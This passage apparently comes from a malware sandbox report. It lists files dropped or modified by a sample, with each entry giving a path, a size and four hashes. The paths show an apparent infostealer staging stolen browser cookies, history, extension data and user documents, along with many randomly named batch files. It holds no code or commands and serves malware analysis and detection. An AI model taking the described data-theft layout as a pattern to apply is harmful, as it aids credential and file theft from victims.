7fd32e30d06acb112161e38afc1980cc46ce52c48547c3f0a0548fd958ee14e9

SHA512
c7c32a2d417ee33e77bf1a1126911a3efc170334b1d509599e8d9c74dc9336e189f3383169c545538ca58d8a75cd2acc9481f2e5baa6ddb29ecd5c9a749eab7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Browsers\Admin\Firefox\afyb4qvh.default-release\history.txt

Filesize
1KB

MD5
b3cf91ab9c9a5f9af6de93696200a520

SHA1
668473210d805c32be9d3a94d7d2a56c4c79e794

SHA256
d25508ec6c03bfa4b1614e9e2bc4cd878ea761adfe4a2824e12a8f14bca2981f

SHA512
9b4d7e2319d5e7fb705f1449ebf1ac3742a9c54fcbff3d6345dd9dab79d20ac39b2297f2f0d3a6d0028167304ae609dbd5d61b6ca9d4fbaab8b2ef188b74ddda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

Filesize
68B

MD5
f67672c18281ad476bb09676baee42c4

SHA1
fb4e31c9a39545d822b2f18b0b87ca465e7768c9

SHA256
d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61

SHA512
ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

Filesize
404B

MD5
71ceb9d9d7669e23bfe51e436ba80146

SHA1
6bba2e9751d982a4f48f26cf519cfc11cd16e512

SHA256
00d95f67a185d97006d1b909fd59d9e3595e3cfe161f77566ebd6dee3428bb64

SHA512
5e7c1d93b954ecdef35a5a6b0e3ecf1cc4bf2a617c3bd2bc97007d3d20795180550554e771a27b22b66bb58227f742a8f3c2157c460731a88f0749fd2730eaf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

Filesize
361B

MD5
4d1dea0992d2b2ffe852366d365b9be2

SHA1
f1341f435a4cbb393dbdba7d7fed346923aa589e

SHA256
4cab02b5fcf284f84c7aa89eca04fb711731942f61fba13ca14a854acea2e659

SHA512
fa9ac73e60645bdbe1ae54dab6b1a9f224e856f3cc6cb5826d660cafa26538adfb9013d84df0a79815e9627509d914e12dd4fbc44c758ca84a69a26082031ed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Storage\leveldb\LOG

Filesize
329B

MD5
c10ec3994ed781a45358259ea7bb317b

SHA1
776a0a2517854f0d381bc7e8d028408b0514c4c6

SHA256
ab3c29a6951dabeec045b0c8306fe224289e524181f8d5aca82868d4a3b75109

SHA512
8a7d7b1fe596dddd1d51fef1143518d05dbb7134f59a4044c461432e0567a92a9112fdfbed02faddd46608866bd1f22d2544cdb1a74a247dfc7fd1f68e9616d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Storage\leveldb\LOG.old

Filesize
329B

MD5
356988b414e31c7bd13bd970dfe0eb07

SHA1
2ce600668c84c96ff30febc85970ba84993ac7c8

SHA256
f19b7fec2e5dee9b0ac41411cf58f917f3b685ce36182924d4b16ba9345381be

SHA512
3242f202da343722c499a5244233df980124cd3903c7a3cdba4e6e6ca2738bbbf442cc7b7a6312e7b40b060728d3bd1ef86da2a6632dbf2742a3169f7f750fe0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\edge\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
3f6df05e22b1fd9fbf64f678966d8fef

SHA1
7996dfa56cdc795779d6dad5c9c12bf20fd053a6

SHA256
331e41669d630147113fe31d89d7ed5d43f4ae1521c323622837b2a5fbc8b96a

SHA512
361292f757342d38df6db5269c3d9a26116848a45f1636807605c000bde1978e1077acd0c2e759706418d2c30b25d67e58e40f35b35fc2cccb08d0ecc9d30be6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\ClosePublish.xlsx

Filesize
2.0MB

MD5
71aad34fe174d02e588ca858f81c484d

SHA1
9ff7e99c786255e5f629053c17113686cb08139c

SHA256
94cc71c724c669ef63e900f95c66a5838d5ea6fd0e559350d5cb0344b425f914

SHA512
86df167390c0f867d7f89a52004228fb3144a5f8362925a294d090a43d44bfcfddeea11a683cc9c1862d2db29cd7e6b882661cffa220e89e883727d0e7f1554f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Documents\RequestComplete.docx

Filesize
16KB

MD5
621c1d93822125c6b225b00ea65be1c2

SHA1
bc52e7fc39dcba5dea8389a049a68feb077b41a7

SHA256
5f9fdab27e50c2f77c8edac547509e8f530fc798d5c9767865e96e31bd42b16d

SHA512
cc7b9cd17692ed0b518f62d2f741ecfd7aceb6a48d1311dce569ec738e2896c66ce26bb4fe8a649bfde1f4b3d15d2a9c4bd679cee3f1cfa269acf64fa7a1d11e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Downloads\DisableJoin.docx

Filesize
293KB

MD5
8fcf3600cf3c67cd17cf6f77e7979da1

SHA1
a569a2171c6848e0f17c284cf0e70a4377875f52

SHA256
44fdd38c3612f1bc5de339299f3cba111a70cf05c5584afa7e8e8a877f5218b6

SHA512
6f7ee6681999e429463c6cefc92ca38ce5bcd8f4d578dde0dcd41fbceead3fbf07fc1a14d5bcfbf2037f2a9e56c17ec9b0ad9360e7dae50a8ddd4eaf0aeb8fc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Downloads\PublishResolve.xlsx

Filesize
388KB

MD5
901a87222a06b74e218f4a2f6be0b257

SHA1
5ac098101072efafa4f50850f78487e3c9412a73

SHA256
11511474b0f6fe0e5f018c75fd2178bba8b07828a1b2f03800f7db13d471188e

SHA512
61273f70e23552d09346fabbeff7d58ec8c78722d797cd0b04a88d399076223a1b6f00c2eb2d98357f89be523e9aaf038fa5116df9d411b90ce090960aa689be

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Files\Pictures\StartBackup.jpg

Filesize
203KB

MD5
d0702dd0b7b5c978528a93bd020ac6b4

SHA1
8bfa2817e83cd5b89223d18f68018ff55f99e537

SHA256
5c6e8e2d5576a849cb550b5c92df867fb2bf1923e8d00bc018c38bba82a18bbf

SHA512
0b96dd9d5e58ed36cfe6573a031fe007a4b6a9b868eb4396ca1da07bfd0f87de8ab0772175e45976f7571ca577b5b837445acbcb55dcab3827eaeedcafeb970d

Download Submit
C:\Users\Admin\AppData\Local\Temp\EUjk8aTPpmEU.bat

Filesize
195B

MD5
0db621b5850e8da48305c24f1ad63f94

SHA1
ea42f031a3076e72852d25ea63cb54f51089e083

SHA256
2cff75d6c70e4b0a192aa8bfcf5b32291fdbb4e808b3620d99f9a4c4831c66ff

SHA512
a9ccca7d40b61cb2e887a39afdec74da1fcc77f0ad11c54b64f1dfbab695ed95f4aefd39a6b14137d4ccf679c0649a5079703c91cb6ca8a97f8613a7b871c2ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\FPUK6aZsfRWh.bat

Filesize
195B

MD5
566c0d2d33696e49c7f01d6116957653

SHA1
821dab8d2619b8e5184d181c73ecb67fdc53f07a

SHA256
e263c9421b2aa747a61cdc8ab4f039fd1e35db95fc85eb51660a319ae1723f91

SHA512
8a3e3465d10ce8b78869e1b55afa2f8bf464f21aba7ba9c114d1250a9831afbcaec58a9fc62db2af1c8387a9af610079afd00ab07914fded434ed661eace7018

Download Submit
C:\Users\Admin\AppData\Local\Temp\Go9se8cYbxLI.bat

Filesize
195B

MD5
069d4526cdc0769309190c6168a11a57

SHA1
cde77db626bc53347c0e481d54e3bc73abbd35ae

SHA256
6c628342e5a64c45d03e2623387702feb07e6171fec824698b604983cb9189bb

SHA512
7cbadf4ed7b8fc0827415b8bba98dd8fffce106a8a0d5f892a2ba9f92f79df2404758143063008b3cf7b5bc4e981264dd5c75b78d0c2b917fe34e04076efd8e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\LHYFtZRk7iUF.bat

Filesize
195B

MD5
03a0df3ebe8604efb18f13ea7de58a08

SHA1
51bf460e58311ca78318ca2d448ade3147362991

SHA256
000a691e677cb5afa4595e1528f9e1de4a3fd22d958feac664dd5facac04fe99

SHA512
b60dcb11680097264e36b20e70f6a6347d04a2849bc22fc24b8dced848ce416cc997d9b550eaff395de91124772c26e659a7788a344d4d1f0d9cefc9114d094a

Download Submit
C:\Users\Admin\AppData\Local\Temp\LUAIVYiGNeaD.bat

Filesize
195B

MD5
a1ee46dca4f47c52cdcd70762cf292ba

SHA1
2f53a16fd4bd635b9d018f817a0837e61e38334d

SHA256
4595d8b326a1859f5a28fde7459215bdc6a098db366752128594af03be579808

SHA512
e9e0785af526cc8e4820b066c8add0c612f21de93f196abc6a6fa5ac94aea423eff1b8e0f1f184e4cd9fbf27b7e1761b7ceb70e384c15513c8c94cf234102c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\N5glecv7Xqgq.bat

Filesize
195B

MD5
7da122d11ceff683ac4f8b41642115a9

SHA1
137138fe7c3953c5d6785297e81487ba48252c8c

SHA256
e2c70b9ffbd0c6c585c3141525e02ab3db24562eff2b28fb937cec99ec2a888a

SHA512
3133efc2e94b496f93d829fdef9ff2c2295fe3e4f14ceaff1cb822a43d61d6a80082d9d8bf9486d333a324b6488d47b15e672beb996ec06811d6c7f8d83e8abb

Download Submit
C:\Users\Admin\AppData\Local\Temp\OkFkgqLNxOIk.bat

Filesize
195B

MD5
63c419771b49f5b1dc25d95dd5c49a35

SHA1
4da7b00851a0064792a23acbebc15a71d1b38e2c

SHA256
9b6748e24a32c5c13c8f549efea7810488435a6c64645f8e5c5c37eff7a2cc3d

SHA512
5c681dfe9724f16d3917b4252cbb1c458a938d364fe60223b866febbb0b5fe50a8ffb8512ea269becc1c4df3b6d3423ce1fe6742d2f39aee2aa0b41dfab5bbf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Edge\Default\history.txt

Filesize
710B

MD5
9e9373201677ed7105a7d50fdf662b7c

SHA1
b42452ac59a910f8df4a6977e7605e7ccdbb0574

SHA256
f5907263d778a9f5f5000e19a6ebe310491b7afbd2635a2c1edc2f544fb9e27b

SHA512
04bf665d6ffc125f51782ffe4219e1978fa729b09dabc090647ac1b5ed4942e49a16cf0de6020cc85de8721b476e524f7eda8273254865e5b893493481b81bde

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Edge\Default\history.txt

Filesize
1KB

MD5
41dd077376820426ee04479dd3e6908b

SHA1
269aa9d65cab22114f10b710bddb6232ee093f08

SHA256
877776cd515d3f1455ce580ad382e10bc9bb9c5eff9983ecaf47950392bfc33c

SHA512
7750d01637e92a9f3037debe5252e4f2d49ce4329c81277a001ef086e835f7f74b845bbd794e8b52b28a027f03939d5a2e8f31c0e4ff258ebebfca4d8a2ad390

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\afyb4qvh.default-release\cookies.txt

Filesize
1KB

MD5
1cda2fff1fcd959b102d0e8ac6673986

SHA1
fc75ec9193a8371f4fbc4537475f3ae63b6793ca

SHA256
0f74d25cc4459a585c96a424fac9671a5940e276dd63ca9f6c6e1d84ddbf7563

SHA512
ef8a4a022c7e1e3e794d1e09a8f75d821d21c58b157761200173a517005320678b711bd95440e3314aba60091bf30b5199420b08faa0f8809217a0515747bb13

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\afyb4qvh.default-release\cookies.txt

Filesize
2KB

MD5
669d5cc3d67f3978f4130d2033edddd3

SHA1
7bfe14d0a0a8ec8737159cbc6b08a9d9f2a9c3e5

SHA256
e8e236a3550938b67ba1225ae0ba4391bdde3b35954e0609b0fe398114531b53

SHA512
55eeeae568793415de9484db91c361cbf405577ae40fcfb86bad2a85208e9e8990ff4e62ba11300a2f05a28f7d1349a651534b705faaa938463b4de19ba74bdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\afyb4qvh.default-release\history.txt

Filesize
1KB

MD5
89901a2baf613857d4c3fe089acc2243

SHA1
2d360d3d2d8cc6714867bb73c1c3e51ba7327b5f

SHA256
cbfbf3c1d7890049d9cffd576756456e36663b99604ce38a60fea03776164f8d

SHA512
216f21428f7610fe832b72da47a65892127b7c4f2e30be952c334e293564fa268201a0ed6696beb5afc9feebe3d761a8cbdd0daaaf52e4f40a19d4e5f67be56a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Browsers\Admin\Firefox\afyb4qvh.default-release\history.txt

Filesize
3KB

MD5
4538f5716083f5bf24bb439cb2b0567b

SHA1
eefe933016307b50c457c17a1a1c687887915579

SHA256
5963c42ee276ebc24e735cd1aa569958747fc7a1c16c68124706e84160d9ca96

SHA512
a09d9c4757653d3ab2b67c3e6892d5fdd617704517f8bbe2f169c9cb71630acc01748c2e151a7f54509b6c0b3f725c277161a5ad2798109ed4ea7849ed8c16c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RealtekDrivers\Extensions\edge\Default\Local Storage\leveldb\LOG.old

Filesize
334B

MD5
5dfb873204cb307bf1759185a3fa83c2

SHA1
46909cb3cf7184647a3b702b569feb2df0635ae6

SHA256
c99ed5e547729e217fde9f7014e8c4da65eb4ec97fd116a4763249dca347c465

SHA512
c794336ee97fe064dbaac8a68c9dbc94298b87b7bd749b29e7afb57749b6e471c0068b5074fe56e9367225e9c1ed2b3650bbe3c74a1800c88c417e29d068cc98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp2DE.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\VFUJwOGwcYIG.bat

Filesize
195B

MD5
a7a8ec473d4ac580f3902e917d559f13

SHA1
b463d51217e931cdc8ca1665ce4b7a72565ebe38

SHA256
a47c885d1ec572931966208b6790e60455722c6848ac71dd3d18e421ab850f84

SHA512
a9699ead34be5a8b373b3bf6b0acbef69e7da0e45b70b89ccae480b0ef79dc548fd33a840df8bf4cf34aad8024f84f46fc83aa65e47a87655dd3ebc36c67224f

Download Submit
C:\Users\Admin\AppData\Local\Temp\XFtIoMguWhHE.bat

Filesize
195B

MD5
32b7fb6d89832f87f8cc7f6950c2542e

SHA1
07d7124cf1e76ecf8c0ceb43152d69c420029040

SHA256
d18c85fd6d6be83463e1d72869bf831307dc60354b85c1fa6cf362112bc1e3df

SHA512
4905c1c615388f5abc3ef7fff8a0024f385e4152f5d546e6ea59961773bfa94133ddfe14c748d484ed5d6324010f70353491a6fd4017bb4551caa4b428a56359

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzwat4yu.4ap.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bxRrYUYz9Mi9.bat

Filesize
195B

MD5
c6c382921b9188baf20ffb1e6501c916

SHA1
5f1d76ddfe257073cc679bcce7852d2dc53288e4

SHA256
7784c1f6351d2ad5db09f70714e9ed731657ebe5c563cfd1625b0a4934ea495b

SHA512
dcf8201f6417b390e539d8f34a9e39b467d05f99e315def06812ca206b225be74119dc53720443905cb1e983c06b8be2dbd73e0fc9dd0c5dde52bd7b50def5b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\hMjSHOZztanX.bat

Filesize
195B

MD5
818266e39838356821831b63a585e02d

SHA1
fe90014e5dfe9e07ab793a39f394464c83fbf0cb

SHA256
bcb44eed5974a67b40f8d36a356a3ed45108cedaf9067bf1361f3714b01b4a2d

SHA512
98478a3d6fd2efbe8c9020de69dcda2b4d5dc14e3b4a48bb23f6f4c6024a553c58c0939b3f3a5ea6130b8da9c63266fe69da6f6cc5fbce072f9e4c496c6cab5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\i3alJgtxcZKQ.bat

Filesize
195B

MD5
2b5344693bfe96414e12febfd45e041b

SHA1
5bb04b034b39c966a71fae7679804225d80f36cf

SHA256
35d7ba7c6aab04093f8eba402cdab7466de5923079f81c5ea27772b4a31542b6

SHA512
b64011a66ab1e244a2529f30164a99bf793c0c2ea46b90d09c3ab6735d902f42a3c777ebc75aa835993a16981e0c2aa5e2acddeb58846c1603e1cf5153101428

Download Submit
C:\Users\Admin\AppData\Local\Temp\nFLOTydIeZb9.bat

Filesize
195B

MD5
2cdb85194529e121ff0c2107b5a415c0

SHA1
cb11103585f998f7a614c9eee8e0924c077750a2

SHA256
0d291ec7bc750c50293a96256c5257231d3d33baeaa322563555e7a6eb23bb94

SHA512
ab658160f23ec67f4bde8c380874e98111aeb62cc3814b17397152d7b167e968a22233c0aacbee6eedd27839386fa8942a50c10aa83aff508b6d2381f4429982

Download Submit
C:\Users\Admin\AppData\Local\Temp\oGUY14fQUx6Y.bat

Filesize
195B

MD5
01a2786cb5a1d678355fada30160cac8

SHA1
7d341f7d8fe31c45b10ee978b5d27fc9d1deae89

SHA256
082507e6d061b690912e6edaa028dac30dbbb0fc98c8be1f042948b9cb6303c4

SHA512
20ba49e875382fca523f2e7536c57c252798750055f4e4b27a3d7b63bc9e82442117f844e564f2bb58478d355c6a182a6ccb7bff737f72b949a743be1ad081fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\rCOZke83tgi9.bat

Filesize
195B

MD5
aa6c55b64c7db6a4008a5af7e7aa06a6

SHA1
1202895ec25332ec7c678dbdaf349424bdc4c8eb

SHA256
b690e56658796ef931335c9e0cfaecd8781b98567ed0155f5af434ec80dcf177

SHA512
ee77dc8309f5f0587efb2cfe7f8665ae5cf94a0f4efed272a4aed9a60d0802d926250db7653dfa082593f64f291f6d5c9e3f71284373a171e04cee76a84c27bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\y3nuAzQq2Uw5.bat

Filesize
195B

MD5
9d1e094a8859288a8ce4ce029b228e03

SHA1
1d1eea3412e75cb9ce33b41f9cfdc75019e50147

SHA256
a680f459984d0d1c197ea48c239f943f8a1b08722b61b74622a96592ee3cfbe7

SHA512
23139cdd2c87251e50cd37f5e0d834774ce6fa0370e73d2c007589db244b66f3c9ceeeb02524526a9ea2340540841bfb5ccf603405d3fa3419d0b0806c0e7924

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1669812756-2240353048-2660728061-1000\0f5007522459c86e95ffcc62f32308f1_6962ce98-49e8-4fd2-a97b-067651396527

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
20KB

MD5
3ee499a8392c2045f58879c9d759dfd2

SHA1
86d7930bfb3e76a8ba4ae4a49c9fb3193d3871d3

SHA256
5432c9b3ee82773fa50348ab972d76927c5c12a3dd575af8f9fbb8ec4dfb785c

SHA512
c2081f24b11d982a09c1b6c0ee41442854cb1509a2167c878945822f7739e7581f5a0ac414a5bf4090666ed55dfc9771b957ac2a2b03641a9facd3d8f5a664f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
4b97474840abbf249918ef5dce9e7465

SHA1
ad662f1120f8ba851eef83d630779bba4ed48dff

SHA256
af904074335d8200444b4ff6bce15e77ac86fc58d76626842a3ae2d8825c4fa7

SHA512
8960dc3ce537da535588fe17f90638f0e467cde8f0f1d4821c19c33430b661f339fe1c71a803eecc49f714c3f302e1c632f68cf9351983ca9073348052445a42

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
10KB

MD5
4803edd398e751959e3262db3678e2b8

SHA1
5e0be5d68be54be95dcd53983776db588fdf4d0c

SHA256
b6044443f8b6d925da09cae4d69ad766cdff496de2c747c7f692107d67fd839f

SHA512
c6fdbbfb3498c981e0b92753572669d5bbd2e66c67ae558726007c08bce8a9c797a41dba109abc8b9abb925e94acca832034e7b127672a9250735e2cdf5a90c5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
13KB

MD5
37d767ad645295bb6a9dd0e28faf3fa5

SHA1
afdaf41f7b1948157418b02d1f47a844b34f6eba

SHA256
efb966eab17489c7cc1b5c094a7141a2a7658871ce1ae934d7bdfd8bd34dad32

SHA512
49af48793b805bca0beb1e61c34f7e52db68989590d72e646c0204127800bfbfc7a45a95d420495050f3e1b90366c1a44f05b0d1c62ab8adcf33b15a5e4293f3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\AlternateServices.bin

Filesize
7KB

MD5
c6d87e1a5bcd2a72601c2f971709b2eb

SHA1
43f17c7c84025ebd7f214355a3421c45f986fa7c

SHA256
36f4bf0554eda332b9c531e8da3466689c84773a318780332771ad23e64c8f9d

SHA512
bd637b1d1882c45399117db614c6668a36466f97f04864c5761c3efa90a3b559ece1d715017031124ef4782edeb942c292443d4c20e863714a85205b786e2441

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\SiteSecurityServiceState.bin

Filesize
2KB

MD5
a08a13118f764b638fdc0eea170dd9d9

SHA1
312b5b39c24290dbfd4e0704821b89ed265ca921

SHA256
90a2ce3d2553cf9bf20384ebbfdbc3125d284bcc75bcb93d28b8fc6a4ccb5924

SHA512
20f47e5050f7f72250d83ba62e33c176b1847468ec56fb77b8b60ef5db340f622930a6b326cf4f3d728d454265d9b2098da437f2beb22631ee82a8c963a146c9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\cert9.db

Filesize
224KB

MD5
33813ad2dbec5833dc19a78b593968de

SHA1
16d2e5b2751c3c4d552f9279edbbe52780e06b82

SHA256
85b6061dedfb89fb3627a8fccf5e700d4cd504396fa78b84e0469eab4a49ba53

SHA512
383f0c53cd969d32a71d67d10c1fb30708b45bd1893db3127265444d6095899b32b32f758c4165e2a5a1d95684972df3a657f5545970c57e6c3c7d08f2a288cf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\crashes\store.json.mozlz4

Filesize
66B

MD5
a6338865eb252d0ef8fcf11fa9af3f0d

SHA1
cecdd4c4dcae10c2ffc8eb938121b6231de48cd3

SHA256
078648c042b9b08483ce246b7f01371072541a2e90d1beb0c8009a6118cbd965

SHA512
d950227ac83f4e8246d73f9f35c19e88ce65d0ca5f1ef8ccbb02ed6efc66b1b7e683e2ba0200279d7ca4b49831fd8c3ceb0584265b10accff2611ec1ca8c0c6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
21KB

MD5
f46c8cd342c5f56807f74171eee7b0a7

SHA1
92074a27698ce4e2950e6bdbf20b79091669534f

SHA256
c275184a7a8b65478d8964ea68bd8db73dce2e8b6decf5949b900c5215f4cc3d

SHA512
b758126ea5904e6a505f36f1b41200eb14cd1d88de82d69cba20617896cf5265ac2385c4679910add44a8d8b603edcd6e509ec0bbe180a8ed9c06a066bf5ec09

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
50KB

MD5
24bf1a5d25d6d61bcd7467efb1cc11fc

SHA1
63d8f5d527aecc80ea457a0609386a6a1db6af65

SHA256
4c35dc84cb5f2e3d1450ba57266efe84a6a79022e77d117f6338a14fb52d3f2d

SHA512
4242e62cd36e741040aa37f43aa724ce7727e0eb13b769e3b45b9428c7740043c89d222fc8943f36130036054d201e47447c869955200338ae32dd1ab196bd3f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
33KB

MD5
938c888748bd07f21d403c92151cb305

SHA1
0b5c7f359360164a2d1b83a010c71db00dc4b31f

SHA256
a9201a90f30151f8a25677bc3377fac395818108243f9e04c03e8443415fad87

SHA512
b3d19def0db3b8f9a77dfeaf00ea1a4cfc69eca7be171cc62d67f3dc745474c036298e52f5e985415c4126df8f861d13e477a07d690dd8705ac67d85b4f9b8d5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
b1aa3ab6e5dba666377742930dc4fd38

SHA1
df25602512fd829b0e1966bfd456dbafe25b798e

SHA256
b7a65399e110a43127053c40636af950c7ec96d5964a02d758c270729acec984

SHA512
238ece3641a962aeb34bf21e225e2af37adb7ca9a7df1130aebcf866477bd80f08f090ac066d793ff83c7a7ee21f8cdef2c02c3d7462144a787aee1983f342b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
82KB

MD5
1fd2923ebae8c4cdd3b510d6d6bf8258

SHA1
fcd1a64ea6e015775bab2eddb40057ef56015292

SHA256
37c11b942cb6dd5df308129db0f230afc2867bcf7f7380c619562f1a31efe722

SHA512
1d330c51d3fe801dbb2a5d5f09389cf7f21e8506fa14b4d566c27d5007eb02614b78ee3f61e626d6bd9b4cd5dbabcb35934ac81f64a541a18650113de40aba77

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
51KB

MD5
59643b4b57ccba5ac457f2ec07b10275

SHA1
a8bf244de74630d74eb1155877b3073fae4853ae

SHA256
be551b0f45b283eb92b4c27ae347fda1bd3268834a8226a8eafc46612cf1cf46

SHA512
cd2a981911f649aa49b715a32c26d2022df8ae824f2741282c66673aa2eb5be4b5c714dbc4bd628db6b5f5a55bda202b35a09487380042c153246932f15b57d1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
83KB

MD5
1397db64f83eda3981c08c8e930a7ed6

SHA1
354f979388d5952dc316a25e51f17fbaa5fe7344

SHA256
1ff864013ad6a48bdc9cf88613b7df0990f1cb08997e73faa6faa842d0d83dc0

SHA512
5a7919cd52fb4e0615c12912f2908e3070333e792a35b9723cbff7e3bc5d4981af01b082ebd50a4d6ab68d4515f6d3e375159a90549b76a01b1ce1f60ef51999

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
920a0a1246809666ec986b45caef206d

SHA1
795cbdaebb277ec6cb1a6f209a77e05e6e428130

SHA256
ef1c9d9569d41a02d82f5514d4fae8697cabf8b82802dab5497474300ab050c6

SHA512
d9f10cc68aa3f43dd5231044b224e887a82789af95e98a9975d72c1bd718de3e5c844973347b8e1b6a6a893caa68468ebcc99a208a9cbdbdfda463f79681a871

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\0311e2e6-9c65-41e5-bf9b-5055c5f1de6c

Filesize
734B

MD5
863f90b1fd60402c5e821dbe822b5db1

SHA1
e340c0a5accbb3fd4e9218c7bc2024ea2629d40c

SHA256
56a840d6545b871d6838546a744131f3236776b2801f2ba4688d28c71bff2d9f

SHA512
90c4197c05014d9f6f36e6a7f3b0845cd856247117f625d2dbc6aa82599089ae384720d3dfadf260c3cfc89e7c60083c8e9001df178167f860977b2a72731806

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afyb4qvh.default-release\datareporting\glean\pending_pings\21e7deaf-fa81-4faa-a9bf-e4a1b2535df1

Filesize
3KB

MD5
f31c7d3496e1d290cda7f709d947ee85

SHA1
